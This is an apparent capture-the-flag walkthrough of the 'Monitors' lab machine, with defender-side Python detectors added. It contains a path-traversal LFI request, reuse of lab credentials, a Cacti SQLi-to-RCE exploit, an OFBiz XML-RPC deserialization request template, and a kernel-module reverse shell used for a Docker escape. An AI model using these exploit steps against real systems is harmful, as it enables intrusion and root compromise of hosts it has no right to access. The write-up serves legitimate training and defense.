Monitors

Published: May 13, 2025

Enumeration

Scan

nmap -A -oN nmap/detailed.nmap -p22,80 10.10.10.238

WordPress

Visiting the website on port 80, we find a WordPress site.

After some basic enumeration, we find that /wp-content/plugins has no index file and directory listing is enabled, so we can list the installed plugins.

The readme.txt of the WP with Spritz plugin tells us it is version 1.0.

Foothold

Exploiting WP Plugin

Next, we can look for public exploits using searchsploit:

searchsploit wp spritz

The exploit-db entry describes an LFI vulnerability, which can be triggered with the following GET request:

GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

From the /etc/passwd file, we note interesting users such as marcus and mysql.
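As an added, defender-side example (not part of the original writeup), here is a small Python detector that runs over Apache access-log lines and flags requests whose url parameter carries a traversal sequence, a local-file wrapper, or an absolute local path, including percent-encoded and double-encoded forms. The log lines, client IPs and timestamps are constructed for the example; the vulnerable plugin path is the one from the request above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not captured from the box). The first
# mirrors the traversal request shown above, the second is the same request
# percent-encoded, the rest are benign.
SAMPLE_LOG = """\
10.10.14.5 - - [13/May/2025:10:01:02 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd HTTP/1.1" 200 1234 "-" "curl/7.88"
10.10.14.5 - - [13/May/2025:10:01:09 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1234 "-" "curl/7.88"
10.10.14.5 - - [13/May/2025:10:01:15 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=https://example.com/article HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.7 - - [13/May/2025:10:02:00 +0000] "GET /?p=12 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# Combined log format: client, identd, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A parameter that is supposed to hold a remote URL should never contain
# parent-directory steps, a file: wrapper, or an absolute path into system dirs.
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\)|^file:|^/(etc|proc|var|home|root)/')


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double encoding (%252e%252e%252f) is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_lfi_attempts(log_text, params=("url",)):
    """Return (client_ip, path, param, decoded_value) for every request whose
    watched query parameter looks like a local-file read attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m.group("target"))
        query = parse_qs(parts.query, keep_blank_values=True)  # decodes once
        for name in params:
            for raw in query.get(name, []):
                value = decode_fully(raw)
                if TRAVERSAL_RE.search(value):
                    hits.append((m.group("ip"), parts.path, name, value))
    return hits


if __name__ == "__main__":
    for ip, path, param, value in find_lfi_attempts(SAMPLE_LOG):
        print(f"{ip} {path} {param}={value}")
```

On the application side the fix is to accept only http(s) URLs for a parameter meant to fetch remote content; the detector above is the complementary control, and extending `params` to other URL-typed parameters covers similar plugins.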

Now that we have LFI, our next objective is to choose files to read, based on what we know about the box, that will further our access. Files related to WordPress and Apache are the natural starting point.

Starting with wp-config.php, we find a plaintext password: BestAdministrator@2020!

Trying the password on the WordPress login, we quickly find that it is not valid there.

Let's take a look at the Apache config now, at /etc/apache2/sites-enabled/000-default.conf:

Cacti

From the Apache config, we learn of a new VHOST, cacti-admin.monitors.htb. Its home page shows that the Cacti version is 1.2.12, and trying the creds "admin:BestAdministrator@2020" works!

With this, we are able to use a public exploit (https://www.exploit-db.com/exploits/49810) to gain a foothold as www-data through authenticated SQLi leading to RCE.

Lateral Movement

Enumeration

Checking out the WordPress database with "BestAdministrator@2020!" as the password:

mysql -u wpadmin -p

Looking at Cacti's config, we find database creds.

Checking out the Cacti database with the password "cactipass":

mysql -u cacti -p

Credential Theft

In marcus' home directory, we see a non-default hidden directory called ".backup":

We can check whether a systemd service uses this directory with the following:

grep -Ri '\.backup' /etc 2>/dev/null

The output indicates that there is a service using a script called backup.sh.

Taking a look at the script, we find plaintext credentials. After trying the password in a couple of places, we find that it works over SSH as marcus (marcus:VerticalEdge2020).
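The finding above, a unit file in /etc pointing at a readable script that embeds a password, is something a defender can audit for before an attacker does. The following Python is an added example, not code from the writeup: it parses the Exec* lines of systemd unit files, looks up each referenced script, and reports those that are readable by everyone and contain a credential assignment. The unit texts, script paths, modes and contents are constructed in-memory stand-ins (the password is a placeholder, not the box's), so the example runs without touching the filesystem.

```python
import re
import stat

# Constructed stand-ins for /etc/systemd/system/*.service (hypothetical units).
UNIT_FILES = {
    "/etc/systemd/system/backup.service": """\
[Unit]
Description=nightly backup

[Service]
Type=oneshot
ExecStart=/home/marcus/.backup/backup.sh
""",
    "/etc/systemd/system/cleanup.service": """\
[Service]
ExecStart=/usr/local/sbin/cleanup.sh --quiet
""",
}

# Constructed stand-ins for the scripts: path -> (mode bits, contents).
# The password value is a placeholder, not a real credential.
SCRIPTS = {
    "/home/marcus/.backup/backup.sh": (
        0o755,
        "#!/bin/bash\nPASS='placeholder-not-the-real-one'\n"
        "mysqldump -u cacti -p\"$PASS\" cacti > /tmp/cacti.sql\n",
    ),
    "/usr/local/sbin/cleanup.sh": (
        0o700,
        "#!/bin/bash\nfind /tmp -mtime +7 -delete\n",
    ),
}

# ExecStart=, ExecStartPre=, ExecStop= ... with optional systemd prefix chars
# such as "-" or "@" before the program path.
EXEC_RE = re.compile(
    r'^Exec(?:Start|StartPre|StartPost|Stop|StopPost|Reload)\s*=\s*[-@:+!]*\s*(\S+)',
    re.M,
)
# Shell-style credential assignment: PASS=..., password=..., TOKEN="...", api_key=...
SECRET_RE = re.compile(
    r'(pass(?:word|wd)?|secret|token|api[_-]?key)\s*=\s*["\']?\S+', re.I
)


def exec_paths(unit_text):
    """Program paths referenced by the Exec* directives of one unit file."""
    return EXEC_RE.findall(unit_text)


def audit_units(unit_files, scripts):
    """Report scripts run by a unit that are world-readable and embed a secret."""
    findings = []
    for unit, text in unit_files.items():
        for path in exec_paths(text):
            if path not in scripts:
                continue  # binary or script we have no metadata for
            mode, body = scripts[path]
            readable_by_others = bool(mode & stat.S_IROTH)
            has_secret = bool(SECRET_RE.search(body))
            if readable_by_others and has_secret:
                findings.append({
                    "unit": unit,
                    "script": path,
                    "mode": oct(mode),
                    "reason": "world-readable script embeds a credential",
                })
    return findings


if __name__ == "__main__":
    for f in audit_units(UNIT_FILES, SCRIPTS):
        print(f"{f['unit']}: {f['script']} ({f['mode']}) - {f['reason']}")
```

To run it against a real host, populate the two dictionaries from /etc/systemd/system and os.stat of each referenced path. The mitigation is to keep the secret out of the script entirely, for example by handing it to the service through systemd's LoadCredential= from a root-only file, rather than only tightening the script's mode.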

Privilege Escalation

Enumeration

After learning that Docker is running on this box, we can take a look at the process list for anything interesting:

ps -ef | grep docker

Since there is a docker container listening on port 8443, let's create an ssh tunnel to this port.

ssh -N -L 8443:127.0.0.1:8443 marcus@10.10.10.238

Upon navigating to the service, we get a 404, but we learn that it is a Tomcat server.

Let's try to find valid directories on this Tomcat server with gobuster:

gobuster dir -u https://127.0.0.1:8443 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt -k

Interestingly, navigating to a valid directory redirects us to an Apache OFBiz login page. The bottom right corner of the page reveals that the version is 17.12.01, which has a public exploit available:

searchsploit ofbiz 17.12.01

Apache OFBiz Exploit

After some research, we find a good guide on the exploit: https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2020-9496

Download ysoserial, then create base64-encoded payloads like this:

With the payloads generated, make POST requests like this to get command execution:

POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

With this, we get a shell as root on the docker container.
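As an added example (not from the writeup or the vulhub guide), the following Python shows what a defender inspecting traffic to /webtools/control/xmlrpc would look for: <serializable> values in the Apache XML-RPC extensions namespace, which is how a Java object stream gets into the call shown above. The request bodies are constructed; the base64 content is a harmless placeholder or just the four-byte Java stream header, never a gadget chain.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

XMLRPC_EXT_NS = "http://ws.apache.org/xmlrpc/namespaces/extensions"
SERIALIZABLE_TAG = "{%s}serializable" % XMLRPC_EXT_NS
JAVA_STREAM_MAGIC = b"\xac\xed"  # ObjectOutputStream header (STREAM_MAGIC)


def make_body(method, payload_b64):
    """Build an XML-RPC call shaped like the request above (constructed)."""
    return f"""<?xml version="1.0"?>
<methodCall>
  <methodName>{method}</methodName>
  <params><param><value><struct><member>
    <name>test</name>
    <value><serializable xmlns="{XMLRPC_EXT_NS}">{payload_b64}</serializable></value>
  </member></struct></value></param></params>
</methodCall>"""


# Placeholder text, not a Java object.
PLACEHOLDER_BODY = make_body(
    "ProjectDiscovery", base64.b64encode(b"placeholder, not a java object").decode()
)
# Only the stream header, so the detector can show the magic-byte check.
JAVA_STREAM_BODY = make_body(
    "ProjectDiscovery", base64.b64encode(JAVA_STREAM_MAGIC + b"\x00\x05").decode()
)
BENIGN_BODY = """<?xml version="1.0"?>
<methodCall>
  <methodName>ping</methodName>
  <params><param><value><string>hello</string></value></param></params>
</methodCall>"""


def inspect_xmlrpc(body):
    """Classify an XML-RPC body: method name, how many <serializable> values it
    carries, how many of those decode to a Java object stream, and a verdict."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        # Fail closed: a body the parser cannot read is not forwarded.
        return {"parsed": False, "error": str(exc), "serializable": 0,
                "java_streams": 0, "block": True}
    serial = [el for el in root.iter() if el.tag == SERIALIZABLE_TAG]
    java_streams = 0
    for el in serial:
        try:
            blob = base64.b64decode(el.text or "", validate=True)
        except binascii.Error:
            continue
        if blob.startswith(JAVA_STREAM_MAGIC):
            java_streams += 1
    return {
        "parsed": True,
        "method": root.findtext("methodName"),
        "serializable": len(serial),
        "java_streams": java_streams,
        # Any serializable value is enough to block: the endpoint has no
        # legitimate reason to accept Java object streams from the outside.
        "block": len(serial) > 0,
    }


if __name__ == "__main__":
    for label, body in (("placeholder", PLACEHOLDER_BODY),
                        ("java-stream", JAVA_STREAM_BODY),
                        ("benign", BENIGN_BODY)):
        print(label, inspect_xmlrpc(body))
```

Blocking on the element rather than on the method name matters because the method name is attacker-chosen. In production this check belongs in front of OFBiz (a reverse proxy or WAF) alongside restricting who can reach /webtools/control/xmlrpc at all, and upgrading past the affected release, which is the actual fix.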

Docker Escape

With the following command, we can learn of all capabilities of the docker container:

capsh --print

The cap_sys_module capability allows us to load kernel modules, and since the kernel is shared with the host, loading one gives code execution as the host's root user.
Here is a great guide on how to create a reverse shell kernel module:
https://greencashew.dev/posts/how-to-add-reverseshell-to-host-from-the-privileged-container/

With the kernel module created, we get root on the host by inserting it with insmod:

insmod reverseshell_module.ko
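The capability set is where a defender can catch this configuration before a container ever runs. The following Python is an added example (not from the writeup or the linked guide): it decodes the CapEff bitmask from /proc/<pid>/status into capability names and flags the ones, cap_sys_module among them, that let a container reach the shared kernel. The /proc excerpt is constructed; the default Docker mask and the bit numbering follow the kernel's capability.h.

```python
# Capability names indexed by bit number, as in linux/capability.h.
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]

# Capabilities whose presence lets a container affect the kernel or the host
# directly; none of them is in Docker's default set.
ESCAPE_RELEVANT = {
    "cap_sys_module", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_rawio",
    "cap_dac_read_search", "cap_net_admin", "cap_bpf", "cap_perfmon",
}

# Effective set of a container started by dockerd with no --cap-add/--privileged.
DOCKER_DEFAULT_CAPEFF = "00000000a80425fb"

# Constructed /proc/1/status excerpt for a --privileged container on a kernel
# with 41 capabilities; sample text, not captured from the box.
PRIVILEGED_STATUS = """\
Name:\tbash
CapInh:\t0000000000000000
CapPrm:\t000001ffffffffff
CapEff:\t000001ffffffffff
CapBnd:\t000001ffffffffff
CapAmb:\t0000000000000000
"""


def decode_caps(hex_mask):
    """Turn a CapEff/CapBnd hex mask into the list of capability names it holds."""
    mask = int(hex_mask, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]


def capeff_from_status(status_text):
    """Extract the CapEff mask from the text of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return line.split(":", 1)[1].strip()
    raise ValueError("no CapEff line in status text")


def assess(hex_mask):
    """Summarise a mask: all caps, the escape-relevant subset, and whether
    kernel modules can be loaded from inside the container."""
    caps = set(decode_caps(hex_mask))
    return {
        "caps": sorted(caps),
        "risky": sorted(caps & ESCAPE_RELEVANT),
        "can_load_modules": "cap_sys_module" in caps,
    }


if __name__ == "__main__":
    # Inside a container this reads the real effective set; elsewhere it
    # falls back to the constructed privileged sample.
    try:
        with open("/proc/self/status") as fh:
            status = fh.read()
    except OSError:
        status = PRIVILEGED_STATUS
    print(assess(capeff_from_status(status)))
```

The operational rule the check encodes is the one Docker already supports: start containers with --cap-drop ALL and add back only the capabilities the workload needs, and treat any effective set containing the risky names above as a finding to explain or remove.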